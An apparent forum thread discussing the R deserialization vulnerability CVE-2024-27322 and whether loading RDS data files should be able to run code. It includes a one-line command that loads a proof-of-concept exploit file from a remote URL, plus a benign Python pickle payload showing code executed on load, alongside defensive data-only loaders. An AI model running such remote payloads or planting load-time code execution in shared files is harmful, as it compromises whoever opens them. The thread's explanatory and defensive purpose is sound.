Isn't this demonstrably false? I.e. run this [1]
load(url("https://github.com/hrbrmstr/rdaradar/raw/main/exploit.rda"))
and it opens the Calculator application on Windows/macOS (or echoes 'pwnd' on Linux).
When someone can easily cause their hidden system code to run on my computer, that's a pretty serious vulnerability. read.csv() and fromJSON() do not allow this.
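For readers who don't know R, the same "data file runs code" property exists in Python's pickle format, so it makes a convenient cross-language illustration of what the exploit.rda demo does (this is an analogy, not the R mechanism itself; the payload here is deliberately benign):

```python
import pickle

# A class whose __reduce__ tells the loader to call an arbitrary
# function at load time. A real attacker would use something like
# os.system(...); here we use a harmless eval as a stand-in.
class Payload:
    def __reduce__(self):
        return (eval, ("21 * 2",))

blob = pickle.dumps(Payload())   # looks like an opaque data file on disk
result = pickle.loads(blob)      # ...but loading it executes eval("21 * 2")
print(result)                    # -> 42: the "data" ran code
```

By contrast, read.csv() and fromJSON() parse into inert values; there is no step where the file's contents direct the reader to call a function.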
I happen to have packages on CRAN that readRDS() from AWS S3. So if I happen to be evil and make some trivial alterations to those RDS files to contain a hidden payload, well, it's child's play. That does not seem sane to me.
FWIW, my recommendation is to create a function like readRDS() that only reads data (and does not allow any extra code to be run), then use that in place of the traditional readRDS() on CRAN. Then if someone did craft a malicious payload, it wouldn't matter. The (harder) alternative would be to disallow any functions that have this remote code execution 'feature', i.e. allow only read.csv(), fromJSON(), and similar.
[1] https://rud.is/b/2024/05/03/cve-2024-27322-should-never-have...
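The proposed "data-only readRDS" has a direct analogue in Python's pickle machinery, where you can override how global references are resolved. A minimal sketch (the function names `DataOnlyUnpickler` and `safe_loads` are mine, not a standard API):

```python
import io
import pickle

class DataOnlyUnpickler(pickle.Unpickler):
    """Refuse to resolve ANY global reference, so only plain data
    (dicts, lists, strings, numbers, ...) can round-trip."""
    def find_class(self, module, name):
        raise pickle.UnpicklingError(
            "refusing to load global %s.%s" % (module, name))

def safe_loads(blob):
    # Hypothetical data-only loader, analogous to the restricted
    # readRDS() suggested above.
    return DataOnlyUnpickler(io.BytesIO(blob)).load()

print(safe_loads(pickle.dumps({"x": [1, 2, 3]})))  # plain data loads fine
# safe_loads(pickle.dumps(len))  # any code reference raises UnpicklingError
```

A crafted payload then fails at load time instead of executing, which is exactly the property you'd want from a CRAN-wide replacement.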
I'm not an R programmer, but aren't you downloading a file from the Internet and executing it?
You could do the same thing with python/JavaScript/lua. Heck, you could do it with C - download, compile and then dynamically link.
If you want security don't download files from the internet and execute them.
Downloading, yes, executing, no, or at least not to 99% of R users’ knowledge prior to this recent occurrence.
If a malicious user tries to smuggle something into a CSV or JSON file, that isn't possible. But when reading in an RDS it's trivial.
I feel very uncomfortable about asking anyone to trust my code that much, even colleagues or friends, and I definitely don't feel comfortable trusting theirs.
Their data files on the other hand are fine, I’ll gladly read their csv or json file. (would also be glad for their RDS if there’s a way to read it without also allowing for remote code execution)
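The CSV/JSON point can be made concrete: a JSON parser can only ever produce inert values, so hostile content arrives as a plain string rather than as something executable. A small Python illustration:

```python
import json

# Whatever a malicious author writes into a .json file, the parser can
# only produce dicts, lists, strings, numbers, booleans, and null --
# the format has no notion of "call this function on load".
doc = json.loads('{"cmd": "rm -rf /"}')
print(type(doc["cmd"]).__name__)  # -> str  (nothing was executed)
```

That structural limitation is why handing someone a JSON or CSV file requires so much less trust than handing them a serialized object graph.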
>Description
>Reload datasets written with the function save.
>> This does not prove the concept of promises and/or serialization are inherently unsafe core features. It simply shows there's some implementation issues to address. You go further to talk about these implementation issues which is helpful and good, but it does nothing to prove unsafeness or unsoundness of the concepts of promises or serialization/deserialization etc.
How many languages have gotten and fixed such bugs? Were those languages unsafe/insane, or were their implementations simply buggy?
In practice the difference hardly matters, since we use language implementations, not their ideal conceptual forms. But I do think it's unfair to claim that an exploit in a language's implementation makes the concepts within the language inherently exploitable.
I might be missing something, but it seems there are two different streams being crossed? (You do make good points about implementation imho, nothing wrong there ofc! :))
If I read the project's statement right, they think you should only load what you already trust.
The problem is that many people load things they just found on the Internet. Like `curl | bash` to random things people find.
Note, if it's not obvious, `curl | bash` to scripts on the Internet is just as insecure as the current R implementation.
I also don’t know if deserializing is 100% secure even now, because it only detects whether the root value is lazy, and I’m not sure whether a value’s children can be lazy as well.
I think the larger issue is that most languages are insecure unless you go out of your way to be careful. Many package managers (including cargo) let dependencies run arbitrary build scripts. AFAIK reading a Python pickle file can invoke arbitrary code, which is arguably worse than deserializing an RDS file, because in R you at least have to read the malicious deserialized value. The problem of reading untrusted data isn’t new; see log4j and SQL injection.
All input should be either a) trusted or b) handled carefully. Then it doesn’t matter the language. The problem is that’s not easy. Like in R, if `readRDS` really can still return promises, then “handling it carefully” means inspecting every nested value without reading it (this is possible in R with reflection); or more likely (as with Python’s pickling), read the data in a more constrained format.
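"Inspecting every value without reading it" has a rough stdlib analogue in Python: scan the serialized blob's opcode stream and reject anything that references or calls a global, before ever loading it. A heuristic sketch (the `RISKY` opcode list is my own choice, not an official allow/deny list):

```python
import pickle
import pickletools

# Opcodes that resolve or invoke globals -- the ingredients of a
# code-executing pickle.
RISKY = {"GLOBAL", "STACK_GLOBAL", "REDUCE",
         "INST", "OBJ", "NEWOBJ", "NEWOBJ_EX"}

def looks_data_only(blob):
    """Audit the opcode stream without executing it."""
    return all(op.name not in RISKY
               for op, arg, pos in pickletools.genops(blob))

print(looks_data_only(pickle.dumps({"x": [1, 2, 3]})))  # True: plain data
print(looks_data_only(pickle.dumps(len)))               # False: references a global
```

The more robust option, as the comment says, is to sidestep the audit entirely and ship the data in a constrained format like CSV or JSON to begin with.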
In the sense that for sufficiently complex ecosystems (read: all widely used programming ecosystems) each component may itself be theoretically secure... and yet the ways they are commonly used in practice are insecure.
>> Users should ensure that they only use R code and data from trusted sources and that the privileges of the account running R are appropriately limited.
IMHO, this is a cop-out. Abdicating responsibility for common use patterns in your ecosystem isn't how you make everyone more secure.
Better: 'What are our users actually doing?' -> 'Why are they doing that?' (usually: inconvenient UX around secure alternatives) -> 'How can we make it easier to use secure alternatives?'
It does touch on an interesting point: the 'safeness' of a language itself. A lot of languages have bugs in their core libraries and implementations, and you _could_ go as far as to say that the language is then insecure.
But this is not really true. The language itself is not its implementation. The design choices and concepts provided by R, I think, are not inherently insecure. Though, as this bug shows, those concepts can inadvertently/unwittingly be implemented in an insecure way.
I would like to encourage people to stop speaking about languages as safe/unsafe. This seems to be popular today. Languages are hellishly complicated to implement, and bugs come with complex implementations.
Raise the bug, and if it's severe, raise awareness of it. But don't shit on decades of diligent people's work because you found a bug and want your company or group to get some good marketing out of it. This is inherently unethical. These people are great programmers, likely far more advanced in their knowledge of languages and language implementation than some hacker who runs into a security hole. That should be respected and commended, and hackers can help them improve their already awesome creations.
Thanks to the implementers, thanks to the hackers, and let's all be friendly and peaceful, and not try to turn someone's honest bug into a marketing opportunity by taking a shit right on their work.
So at the end of the day, it does apply patch pressure to regulated companies.
[1] and a blog post for bragging, thankfully they didn't do a name and a logo.
From what I can tell, these RDS files are a common way of sharing data among R users. I would be relatively surprised if reading someone else's dataset was able to execute arbitrary code.
I think this is more like if reading a CSV via numpy could execute code.
A few years back I heard from a lot of people in ML communities that they were surprised that `numpy.load` is able to execute arbitrary code.
• Make clear the bug is due to unsafe deserialization (not serialization as their statement says). This is important because unsafe deserialization is a major source of remote code execution vulnerabilities.
• Update the documentation to make it clear that R’s serialization and deserialization functions are not safe to use for sharing data across the network. Serialized objects should be treated as code, not data.
I am still amazed at how many people on HN seem to get worked up over vulnerability names. God forbid someone also slaps a piece of clip art or whatever on the blog post. Worse yet, if they buy a $5 domain... the horror!
Maybe it's just me, but I'd much rather remember "Heartbleed" over "CVE-2014-0160".
For less cool bugs, a logo and a name seem rather... strange, because it happens all the time and it's not clear why it's special. Imagine a coworker fixed a random JIRA ticket, say "switching to night mode does not work on a certain page", and then named it "Nightfall" with a logo and a landing page and a lot of bragging in the next periodic meeting.
Cybersecurity firm, surely? Of all the things not to proofread … a press release.